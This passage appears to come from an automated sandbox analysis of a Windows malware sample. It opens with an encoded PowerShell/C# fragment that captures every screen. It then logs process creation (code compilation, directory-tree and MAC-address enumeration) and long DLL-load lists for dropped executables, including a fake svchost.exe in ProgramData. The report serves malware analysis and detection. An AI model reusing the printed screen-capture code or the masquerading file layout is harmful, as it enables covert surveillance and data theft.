AAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dxgidebug.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: riched20.dll
Source: C:\ProgramData\svchost.exe	Section loaded: usp10.dll
Source: C:\ProgramData\svchost.exe	Section loaded: msls31.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windowscodecs.dll
Source: C:\ProgramData\svchost.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: propsys.dll
Source: C:\ProgramData\svchost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: edputil.dll
Source: C:\ProgramData\svchost.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\svchost.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\svchost.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: netutils.dll
Source: C:\ProgramData\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\svchost.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\svchost.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\svchost.exe	Section loaded: slc.dll
Source: C:\ProgramData\svchost.exe	Section loaded: userenv.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sppc.dll
Source: C:\ProgramData\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: pcacli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
